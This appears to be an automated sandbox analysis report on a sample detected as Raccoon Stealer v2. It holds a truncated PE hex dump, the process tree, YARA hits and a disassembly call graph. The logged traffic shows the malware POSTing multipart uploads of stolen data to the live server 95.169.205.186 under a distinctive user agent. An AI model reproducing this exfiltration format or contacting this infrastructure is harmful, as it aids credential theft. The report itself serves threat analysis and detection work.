                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL",bv! a n* ;.text`P`.data|' (@`.rdataDPF:@`@.bss(`.edatan*,@0@.idata@0.CRT,@0.tls @0.rsrc@0.reloc; <@0B/48`@@B/19Rp@B/31]'@(
                                                              Jul 6, 2024 04:22:03.530003071 CEST249OUTPOST /8895a7edf180661435c15d6dcaf4e416 HTTP/1.1
                                                              Accept: */*
                                                              Content-Type: multipart/form-data; boundary=ly5DnI2I9XTIHX9g
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Content-Length: 1250
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:03.835215092 CEST972INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:03 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 8
                                                              Connection: keep-alive
                                                              Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                              Cross-Origin-Embedder-Policy: require-corp
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Cross-Origin-Resource-Policy: same-origin
                                                              X-DNS-Prefetch-Control: off
                                                              Expect-CT: max-age=0
                                                              X-Frame-Options: SAMEORIGIN
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              Origin-Agent-Cluster: ?1
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: no-referrer
                                                              X-XSS-Protection: 0
                                                              ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                                              Data Raw: 72 65 63 65 69 76 65 64
                                                              Data Ascii: received
                                                              Jul 6, 2024 04:22:04.037302971 CEST249OUTPOST /8895a7edf180661435c15d6dcaf4e416 HTTP/1.1
                                                              Accept: */*
                                                              Content-Type: multipart/form-data; boundary=aaMXSLttGwsK4beY
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Content-Length: 5391
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:04.352082014 CEST972INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:04 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 8
                                                              Connection: keep-alive
                                                              Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                              Cross-Origin-Embedder-Policy: require-corp
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Cross-Origin-Resource-Policy: same-origin
                                                              X-DNS-Prefetch-Control: off
                                                              Expect-CT: max-age=0
                                                              X-Frame-Options: SAMEORIGIN
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              Origin-Agent-Cluster: ?1
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: no-referrer
                                                              X-XSS-Protection: 0
                                                              ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                                              Data Raw: 72 65 63 65 69 76 65 64
                                                              Data Ascii: received
                                                              Jul 6, 2024 04:22:05.766771078 CEST250OUTPOST /8895a7edf180661435c15d6dcaf4e416 HTTP/1.1
                                                              Accept: */*
                                                              Content-Type: multipart/form-data; boundary=7aXZ132716Q2Gx9B
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Content-Length: 92085
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:06.216953993 CEST972INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:06 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 8
                                                              Connection: keep-alive
                                                              Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                              Cross-Origin-Embedder-Policy: require-corp
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Cross-Origin-Resource-Policy: same-origin
                                                              X-DNS-Prefetch-Control: off
                                                              Expect-CT: max-age=0
                                                              X-Frame-Options: SAMEORIGIN
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              Origin-Agent-Cluster: ?1
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: no-referrer
                                                              X-XSS-Protection: 0
                                                              ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                                              Data Raw: 72 65 63 65 69 76 65 64
                                                              Data Ascii: received


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:22:21:51
                                                              Start date:05/07/2024
                                                              Path:C:\Users\user\Desktop\60lAWJYfsL.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\60lAWJYfsL.exe"
                                                              Imagebase:0x7ff708e10000
                                                              File size:1'073'152 bytes
                                                              MD5 hash:F7F6EB480FE715733E509D0489171C18
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_RaccoonV2_1, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000002.1679665794.0000027E3B800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_RaccoonV2_1, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000002.1679410416.0000027E39491000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:22:21:51
                                                              Start date:05/07/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:22:21:55
                                                              Start date:05/07/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                              Imagebase:0xdb0000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_RaccoonV2_1, Description: Yara detected Raccoon Stealer v2, Source: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:5.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:27.2%
                                                                Total number of Nodes:901
                                                                Total number of Limit Nodes:23
                                                                execution_graph 18279 7ff708e2be68 18280 7ff708e2be6d 18279->18280 18287 7ff708e51190 18280->18287 18282 7ff708e2bf6a 18283 7ff708e2bf95 18282->18283 18295 7ff708e43fc0 18282->18295 18299 7ff708e335b0 18283->18299 18286 7ff708e2c000 18288 7ff708e511b9 18287->18288 18289 7ff708e511a9 18287->18289 18290 7ff708e512eb SwitchToThread 18288->18290 18291 7ff708e51209 SwitchToThread 18288->18291 18292 7ff708e512f7 18288->18292 18293 7ff708e512a7 SwitchToThread 18288->18293 18294 7ff708e512bc SwitchToThread 18288->18294 18289->18282 18290->18288 18291->18288 18292->18282 18293->18288 18294->18288 18296 7ff708e43fdf 18295->18296 18298 7ff708e4404a _swprintf_c_l 18295->18298 18296->18298 18304 7ff708e22480 VirtualAlloc 18296->18304 18298->18283 18300 7ff708e43fc0 2 API calls 18299->18300 18301 7ff708e335e5 _swprintf_c_l 18300->18301 18302 7ff708e51190 4 API calls 18301->18302 18303 7ff708e33735 18302->18303 18303->18286 18303->18303 18305 7ff708e224cc 18304->18305 18306 7ff708e224bb 18304->18306 18305->18298 18306->18305 18307 7ff708e224c0 VirtualUnlock 18306->18307 18307->18305 18683 7ff708ee7c80 18684 7ff708ee7c91 18683->18684 18686 7ff708ee7c9a 18683->18686 18685 7ff708ee7cb5 18686->18685 18688 7ff708ee7c00 18686->18688 18689 7ff708ee7c19 18688->18689 18692 7ff708ee7d10 18689->18692 18691 7ff708ee7c29 18691->18685 18693 7ff708ee7d27 18692->18693 18695 7ff708ee7d9a 18692->18695 18697 7ff708ee7dc0 18693->18697 18695->18691 18696 7ff708ee7d3b 18696->18691 18699 7ff708ee7de7 18697->18699 18698 7ff708ee7e5d 18698->18696 18699->18698 18700 7ff708e13650 22 API calls 18699->18700 18701 7ff708ee7e86 18699->18701 18700->18701 18701->18698 18702 7ff708e13650 22 API calls 18701->18702 18703 7ff708ee7f54 18702->18703 18704 7ff7090ebc60 18707 7ff7090ebce0 18704->18707 18708 7ff7090ebce5 18707->18708 18709 7ff7090ebdf8 LoadLibraryA 18708->18709 18711 7ff7090ebe42 VirtualProtect VirtualProtect 18708->18711 18713 7ff7090ebe12 18709->18713 18715 7ff7090ebeda 18711->18715 18712 7ff7090ebe1b GetProcAddress 18712->18713 18714 7ff7090ebe3c ExitProcess 18712->18714 18713->18708 18713->18712 18715->18715 18308 7ff708e21210 18309 7ff708e2122a 18308->18309 18310 7ff708e21235 18308->18310 18311 7ff708e21262 VirtualAlloc 18310->18311 18313 7ff708e212ae 18310->18313 18312 7ff708e21295 18311->18312 18311->18313 18317 7ff708e70c34 18312->18317 18316 7ff708e21301 VirtualFree 18316->18313 18320 7ff708e71504 18317->18320 18322 7ff708e7150f 18320->18322 18321 7ff708e212a6 18321->18313 18321->18316 18322->18321 18323 7ff708e71539 18322->18323 18327 7ff708e71814 18322->18327 18331 7ff708e71834 18323->18331 18328 7ff708e71822 std::bad_alloc::bad_alloc 18327->18328 18335 7ff708e7305c 18328->18335 18330 7ff708e71833 18332 7ff708e71842 std::bad_alloc::bad_alloc 18331->18332 18333 7ff708e7305c Concurrency::cancel_current_task RaiseException 18332->18333 18334 7ff708e7153f 18333->18334 18337 7ff708e7307b Concurrency::cancel_current_task 18335->18337 18336 7ff708e730c6 RaiseException 18336->18330 18337->18336 18338 7ff708f0ede0 18339 7ff708f0ee6f 18338->18339 18340 7ff708f0ee0e 18338->18340 18344 7ff708f0ee8e GetProcAddress 18339->18344 18349 7ff708f0eeaa 18339->18349 18341 7ff708f0ee5e 18340->18341 18342 7ff708f0ee13 18340->18342 18343 7ff708f0ef60 GetProcAddress 18341->18343 18345 7ff708f0ee2a GetProcAddress 18342->18345 18343->18339 18350 7ff708f0ee59 18344->18350 18346 7ff708f0ee43 18345->18346 18346->18349 18365 7ff708f0ef60 18346->18365 18347 7ff708f0eeaf 18349->18347 18359 7ff708ed66b0 18349->18359 18350->18349 18354 7ff708f0ef0c 18374 7ff708ebfa60 18354->18374 18356 7ff708f0ef2e 18379 7ff708e13650 18356->18379 18360 7ff708ed66bc 18359->18360 18362 7ff708ed66df 18360->18362 18390 7ff708eaf280 18360->18390 18385 7ff708ea7780 18362->18385 18364 7ff708ed671c 18369 7ff708e12770 18364->18369 18366 7ff708f0ef91 18365->18366 18366->18366 18367 7ff708f0f017 GetProcAddress 18366->18367 18368 7ff708f0f030 18367->18368 18368->18350 18370 7ff708e1279b 18369->18370 18371 7ff708e127a2 18369->18371 18370->18354 18372 7ff708e1d1e0 15 API calls 18371->18372 18373 7ff708e127f4 18372->18373 18373->18354 18375 7ff708ebfa8a 18374->18375 18376 7ff708ebfaf7 18375->18376 18495 7ff708e12890 18375->18495 18376->18356 18378 7ff708ebfaa1 18378->18356 18380 7ff708e1370b 18379->18380 18503 7ff708ee8a00 18380->18503 18386 7ff708ea77aa 18385->18386 18387 7ff708ea77b2 18386->18387 18395 7ff708e12830 18386->18395 18387->18364 18389 7ff708ea77d5 18389->18364 18391 7ff708e12770 15 API calls 18390->18391 18392 7ff708eaf295 18391->18392 18393 7ff708e13650 22 API calls 18392->18393 18394 7ff708eaf2ab 18393->18394 18396 7ff708e12839 18395->18396 18398 7ff708e12878 18396->18398 18399 7ff708e12937 18396->18399 18403 7ff708e1d1e0 18396->18403 18398->18389 18400 7ff708e1293c 18399->18400 18401 7ff708e13650 22 API calls 18399->18401 18400->18389 18402 7ff708ee8920 18401->18402 18404 7ff708e1d226 18403->18404 18405 7ff708e1d257 18404->18405 18407 7ff708e280cb 18404->18407 18405->18399 18408 7ff708e280ec 18407->18408 18409 7ff708e280fe 18408->18409 18437 7ff708e34400 18408->18437 18411 7ff708e28155 18409->18411 18413 7ff708e2812e GetTickCount64 18409->18413 18420 7ff708e281d7 18409->18420 18412 7ff708e28167 18411->18412 18415 7ff708e34400 SetEvent 18411->18415 18441 7ff708e531e0 18412->18441 18413->18411 18417 7ff708e28142 18413->18417 18415->18412 18417->18420 18418 7ff708e28213 18419 7ff708e280a0 18418->18419 18421 7ff708e2802a 18418->18421 18423 7ff708e28239 18418->18423 18433 7ff708e532b0 18419->18433 18420->18419 18427 7ff708e2e3f0 18420->18427 18421->18405 18422 7ff708e28179 18422->18419 18422->18420 18425 7ff708e281b3 GetTickCount64 18422->18425 18423->18421 18451 7ff708e2ab50 18423->18451 18425->18417 18425->18420 18428 7ff708e2e48b 18427->18428 18429 7ff708e2e427 18427->18429 18428->18418 18428->18428 18429->18428 18456 7ff708e22190 18429->18456 18431 7ff708e2e465 18431->18428 18459 7ff708e3b9e0 18431->18459 18435 7ff708e532c6 18433->18435 18434 7ff708e532fd 18434->18419 18435->18434 18465 7ff708e224f0 WaitForSingleObject 18435->18465 18438 7ff708e34430 18437->18438 18440 7ff708e345df 18437->18440 18438->18440 18467 7ff708e22180 SetEvent 18438->18467 18440->18409 18442 7ff708e5329a 18441->18442 18443 7ff708e53200 18441->18443 18442->18422 18468 7ff708e21930 18443->18468 18446 7ff708e5328a 18446->18422 18448 7ff708e5325e 18449 7ff708e53271 18448->18449 18450 7ff708e3b9e0 3 API calls 18448->18450 18449->18422 18450->18449 18452 7ff708e2ab80 18451->18452 18455 7ff708e2abf3 18451->18455 18453 7ff708e2abc6 SwitchToThread 18452->18453 18454 7ff708e22190 SleepEx 18452->18454 18452->18455 18453->18452 18454->18452 18455->18421 18457 7ff708e2219d 18456->18457 18458 7ff708e22194 SleepEx 18456->18458 18457->18431 18458->18457 18461 7ff708e3ba00 18459->18461 18460 7ff708e3bb68 18460->18428 18461->18460 18462 7ff708e3bad5 SwitchToThread 18461->18462 18463 7ff708e3bb0d SwitchToThread 18461->18463 18464 7ff708e22190 SleepEx 18461->18464 18462->18461 18463->18461 18464->18461 18466 7ff708fdc350 18465->18466 18469 7ff708e21a1f GlobalMemoryStatusEx 18468->18469 18470 7ff708e21967 __raise_securityfailure 18468->18470 18472 7ff708e21988 18469->18472 18470->18469 18470->18472 18478 7ff708e70ce0 18472->18478 18474 7ff708e27b90 18475 7ff708e27ba8 18474->18475 18476 7ff708e224f0 WaitForSingleObject 18475->18476 18477 7ff708e27bc1 18476->18477 18477->18448 18479 7ff708e70ce9 18478->18479 18480 7ff708e21af8 18479->18480 18481 7ff708e71574 IsProcessorFeaturePresent 18479->18481 18480->18446 18480->18474 18482 7ff708e7158c 18481->18482 18487 7ff708e71648 RtlCaptureContext 18482->18487 18488 7ff708e71662 RtlLookupFunctionEntry 18487->18488 18489 7ff708e7159f 18488->18489 18490 7ff708e71678 capture_previous_context 18488->18490 18491 7ff708e71540 SetUnhandledExceptionFilter UnhandledExceptionFilter 18489->18491 18490->18488 18490->18489 18494 7ff708fdc0c8 18491->18494 18496 7ff708e12899 18495->18496 18499 7ff708e128eb 18495->18499 18497 7ff708e128de 18496->18497 18498 7ff708e1d1e0 15 API calls 18496->18498 18497->18378 18498->18499 18500 7ff708e1293c 18499->18500 18501 7ff708e13650 22 API calls 18499->18501 18500->18378 18502 7ff708ee8920 18501->18502 18504 7ff708ee8a12 18503->18504 18507 7ff708ee8ac0 18504->18507 18506 7ff708ee8a4b 18520 7ff708e17c90 18507->18520 18509 7ff708ee8be8 18552 7ff708e14480 18509->18552 18512 7ff708ee8bba 18512->18509 18548 7ff708ee8660 18512->18548 18513 7ff708e17c90 8 API calls 18518 7ff708ee8c16 18513->18518 18515 7ff708ee8b2e 18515->18512 18540 7ff708e17dc0 18515->18540 18517 7ff708ee8c5f 18517->18506 18518->18517 18519 7ff708e17dc0 14 API calls 18518->18519 18519->18518 18521 7ff708e17cd2 18520->18521 18522 7ff708e17d17 18521->18522 18523 7ff708e17cd7 18521->18523 18524 7ff708e17d31 18522->18524 18526 7ff708e20c10 2 API calls 18522->18526 18525 7ff708e17cf1 18523->18525 18556 7ff708e20c10 18523->18556 18528 7ff708e17d4d 18524->18528 18529 7ff708e17d62 18524->18529 18562 7ff708e17100 18525->18562 18526->18524 18531 7ff708e178d0 2 API calls 18528->18531 18532 7ff708e178d0 2 API calls 18529->18532 18534 7ff708e17d59 18531->18534 18532->18534 18537 7ff708e17d15 18534->18537 18538 7ff708e20c10 2 API calls 18534->18538 18536 7ff708e17d99 18536->18515 18537->18536 18575 7ff708e16a70 18537->18575 18538->18537 18541 7ff708e17e01 18540->18541 18604 7ff708e174a0 18541->18604 18543 7ff708e17e10 18544 7ff708e17e31 18543->18544 18545 7ff708e20c10 2 API calls 18543->18545 18546 7ff708e17e42 18544->18546 18547 7ff708e16a70 2 API calls 18544->18547 18545->18544 18546->18515 18547->18546 18549 7ff708ee8694 18548->18549 18633 7ff708e14200 18549->18633 18551 7ff708ee86d1 18551->18509 18553 7ff708e144a6 18552->18553 18554 7ff708e144b7 18553->18554 18555 7ff708e144aa RaiseFailFastException 18553->18555 18554->18513 18555->18554 18558 7ff708e20cbc 18556->18558 18559 7ff708e20c4b 18556->18559 18558->18525 18559->18558 18561 7ff708e20c84 18559->18561 18581 7ff708e20930 18559->18581 18561->18558 18589 7ff708e20cd0 18561->18589 18564 7ff708e1711d _swprintf_c_l 18562->18564 18563 7ff708e172eb 18570 7ff708e178d0 18563->18570 18564->18563 18565 7ff708e172ca 18564->18565 18566 7ff708e172c2 18564->18566 18567 7ff708e172b3 RaiseFailFastException 18564->18567 18565->18563 18568 7ff708e20c10 2 API calls 18565->18568 18598 7ff708e17b30 18566->18598 18567->18565 18568->18563 18571 7ff708e17937 18570->18571 18572 7ff708e178e2 18570->18572 18571->18537 18572->18571 18573 7ff708e16a70 2 API calls 18572->18573 18574 7ff708e17912 18573->18574 18574->18537 18576 7ff708e16a90 18575->18576 18577 7ff708e16a88 18575->18577 18576->18536 18577->18576 18578 7ff708e16af9 RaiseFailFastException 18577->18578 18579 7ff708e16b06 18577->18579 18578->18579 18579->18576 18580 7ff708e16b21 RaiseFailFastException 18579->18580 18580->18576 18586 7ff708e20954 18581->18586 18582 7ff708e70c34 _swprintf_c_l RaiseException 18583 7ff708e209c4 18582->18583 18584 7ff708e70c34 _swprintf_c_l RaiseException 18583->18584 18588 7ff708e20a7c 18583->18588 18585 7ff708e209ef 18584->18585 18585->18588 18593 7ff708e1c160 GetCurrentThreadId 18585->18593 18586->18582 18586->18585 18588->18561 18590 7ff708e20d0a 18589->18590 18592 7ff708e20d34 18590->18592 18594 7ff708e20760 18590->18594 18592->18558 18593->18588 18595 7ff708e2078a _swprintf_c_l 18594->18595 18596 7ff708e70c34 _swprintf_c_l RaiseException 18595->18596 18597 7ff708e207b1 18595->18597 18596->18597 18597->18592 18599 7ff708e17b46 18598->18599 18600 7ff708e17c4b RaiseFailFastException 18599->18600 18601 7ff708e17bc6 RaiseFailFastException 18599->18601 18602 7ff708e17bdc RaiseFailFastException 18599->18602 18603 7ff708e17c5d 18599->18603 18600->18599 18601->18599 18602->18599 18603->18565 18605 7ff708e174d1 18604->18605 18606 7ff708e17540 RaiseFailFastException 18605->18606 18607 7ff708e177c8 18605->18607 18609 7ff708e177ce 18605->18609 18610 7ff708e17823 18605->18610 18611 7ff708e177f8 RaiseFailFastException 18605->18611 18614 7ff708e17690 RaiseFailFastException 18605->18614 18618 7ff708e16a70 2 API calls 18605->18618 18619 7ff708e1777d RaiseFailFastException 18605->18619 18620 7ff708e17793 RaiseFailFastException 18605->18620 18621 7ff708e20c10 2 API calls 18605->18621 18622 7ff708e16d00 18605->18622 18606->18605 18608 7ff708e17100 6 API calls 18607->18608 18607->18609 18608->18609 18613 7ff708e178a7 18609->18613 18615 7ff708e16a70 2 API calls 18609->18615 18612 7ff708e17b30 3 API calls 18610->18612 18611->18609 18612->18609 18613->18543 18614->18605 18617 7ff708e1787c 18615->18617 18617->18543 18618->18605 18619->18605 18620->18605 18621->18605 18623 7ff708e16d57 18622->18623 18624 7ff708e16d2d 18622->18624 18626 7ff708e16ece 18623->18626 18630 7ff708e16d84 18623->18630 18625 7ff708e20c10 2 API calls 18624->18625 18625->18623 18627 7ff708e16ee1 18626->18627 18628 7ff708e16ed4 RaiseFailFastException 18626->18628 18629 7ff708e16a70 2 API calls 18627->18629 18628->18627 18632 7ff708e16eb9 18629->18632 18631 7ff708e16a70 2 API calls 18630->18631 18631->18632 18632->18605 18634 7ff708e1421a _swprintf_c_l 18633->18634 18637 7ff708e1c5f0 RtlCaptureContext 18634->18637 18638 7ff708e70ce0 6 API calls 18637->18638 18639 7ff708e14229 18638->18639 18639->18551 18716 7ff708e126a0 18725 7ff708e15170 18716->18725 18718 7ff708e126c0 18720 7ff708e12746 18718->18720 18753 7ff708e1c180 GetModuleHandleExW 18718->18753 18721 7ff708e126d4 18754 7ff708e1bd20 18721->18754 18723 7ff708e1271a 18723->18720 18759 7ff708f0e300 18723->18759 18772 7ff708e1c2e0 FlsAlloc 18725->18772 18727 7ff708e15314 18727->18718 18728 7ff708e1517f 18728->18727 18785 7ff708e1c180 GetModuleHandleExW 18728->18785 18730 7ff708e151a8 18786 7ff708e16320 18730->18786 18732 7ff708e151b0 18732->18727 18789 7ff708e146a0 18732->18789 18734 7ff708e151e1 18734->18727 18735 7ff708e15204 RtlAddVectoredExceptionHandler 18734->18735 18736 7ff708e1521d 18735->18736 18738 7ff708e15217 18735->18738 18812 7ff708e1d7f0 18736->18812 18739 7ff708e15252 18738->18739 18740 7ff708e1d7f0 6 API calls 18738->18740 18741 7ff708e152a9 18739->18741 18795 7ff708e20b10 18739->18795 18740->18739 18801 7ff708e1cea0 18741->18801 18744 7ff708e152ae 18744->18727 18815 7ff708e20f50 18744->18815 18747 7ff708e152da 18823 7ff708e1c440 18747->18823 18748 7ff708e152f3 18826 7ff708e1fb00 18748->18826 18750 7ff708e152e6 RaiseFailFastException 18750->18748 18753->18721 18755 7ff708e70c34 _swprintf_c_l RaiseException 18754->18755 18756 7ff708e1bd5f 18755->18756 18757 7ff708e1bdd1 18756->18757 19075 7ff708e147d0 18756->19075 18757->18723 19078 7ff708e15f10 18759->19078 18761 7ff708f0e320 19094 7ff708e149e0 18761->19094 18765 7ff708f0e346 18766 7ff708e12890 31 API calls 18765->18766 18767 7ff708f0e358 18766->18767 18768 7ff708f0e37b 18767->18768 19118 7ff708f0e670 18767->19118 19106 7ff708ee7b50 18768->19106 18771 7ff708f0e388 18771->18720 18773 7ff708e1c42e 18772->18773 18774 7ff708e1c300 18772->18774 18773->18728 18830 7ff708e23250 18774->18830 18779 7ff708e1d7f0 6 API calls 18780 7ff708e1c332 __raise_securityfailure 18779->18780 18781 7ff708e1c363 GetProcessAffinityMask 18780->18781 18783 7ff708e1c354 18780->18783 18784 7ff708e1c3c8 18780->18784 18781->18783 18782 7ff708e1c3a4 QueryInformationJobObject 18782->18784 18783->18782 18784->18728 18785->18730 18787 7ff708e70c34 _swprintf_c_l RaiseException 18786->18787 18788 7ff708e16335 18787->18788 18788->18732 18790 7ff708e70c34 _swprintf_c_l RaiseException 18789->18790 18791 7ff708e146be 18790->18791 18792 7ff708e1475a 18791->18792 19013 7ff708e12e30 18791->19013 18792->18734 18794 7ff708e146f0 18794->18734 18796 7ff708e20b3b 18795->18796 18800 7ff708e20be6 18795->18800 18797 7ff708e70c34 _swprintf_c_l RaiseException 18796->18797 18798 7ff708e20b5a 18797->18798 18799 7ff708e20bce GetSystemTimeAsFileTime 18798->18799 18799->18800 18800->18741 18802 7ff708e1ceec 18801->18802 18803 7ff708e1cee6 18801->18803 18804 7ff708e1d7f0 6 API calls 18802->18804 19016 7ff708e1d300 18803->19016 18804->18803 18806 7ff708e1cf63 18806->18744 18809 7ff708e1cf48 18809->18806 19026 7ff708e1e430 18809->19026 18810 7ff708e1cf58 18810->18744 19070 7ff708e1da00 18812->19070 18814 7ff708e1d818 18814->18738 18816 7ff708e21089 18815->18816 18818 7ff708e20f81 18815->18818 18817 7ff708e70ce0 6 API calls 18816->18817 18819 7ff708e152c6 18817->18819 18818->18816 18820 7ff708e21020 GetEnabledXStateFeatures 18818->18820 18819->18747 18819->18748 18820->18816 18821 7ff708e21031 18820->18821 18821->18816 18822 7ff708e21077 GetEnabledXStateFeatures 18821->18822 18822->18816 18824 7ff708e1c454 18823->18824 18824->18824 18825 7ff708e1c45d GetStdHandle WriteFile 18824->18825 18825->18750 18827 7ff708e206a5 18826->18827 19074 7ff708e1c180 GetModuleHandleExW 18827->19074 18829 7ff708e1530b 18829->18718 18976 7ff708e1cb80 18830->18976 18832 7ff708e2326e 18833 7ff708e1cb80 6 API calls 18832->18833 18834 7ff708e2329b 18833->18834 18835 7ff708e1cb80 6 API calls 18834->18835 18836 7ff708e232c3 18835->18836 18837 7ff708e1cb80 6 API calls 18836->18837 18838 7ff708e232eb 18837->18838 18839 7ff708e1cb80 6 API calls 18838->18839 18840 7ff708e23318 18839->18840 18841 7ff708e1cb80 6 API calls 18840->18841 18842 7ff708e23340 18841->18842 18843 7ff708e1cb80 6 API calls 18842->18843 18844 7ff708e2336d 18843->18844 18845 7ff708e1cb80 6 API calls 18844->18845 18846 7ff708e23395 18845->18846 18847 7ff708e1cb80 6 API calls 18846->18847 18848 7ff708e233bd 18847->18848 18849 7ff708e1cb80 6 API calls 18848->18849 18850 7ff708e233e5 18849->18850 18851 7ff708e1cb80 6 API calls 18850->18851 18852 7ff708e23412 18851->18852 18853 7ff708e1cb80 6 API calls 18852->18853 18854 7ff708e2343f 18853->18854 18981 7ff708e1cc80 18854->18981 18857 7ff708e1cc80 15 API calls 18858 7ff708e23490 18857->18858 18859 7ff708e1cc80 15 API calls 18858->18859 18860 7ff708e234b9 18859->18860 18861 7ff708e1cc80 15 API calls 18860->18861 18862 7ff708e234e2 18861->18862 18863 7ff708e1cc80 15 API calls 18862->18863 18864 7ff708e2350b 18863->18864 18865 7ff708e1cc80 15 API calls 18864->18865 18866 7ff708e23539 18865->18866 18867 7ff708e1cc80 15 API calls 18866->18867 18868 7ff708e23567 18867->18868 18869 7ff708e1cc80 15 API calls 18868->18869 18870 7ff708e23590 18869->18870 18871 7ff708e1cc80 15 API calls 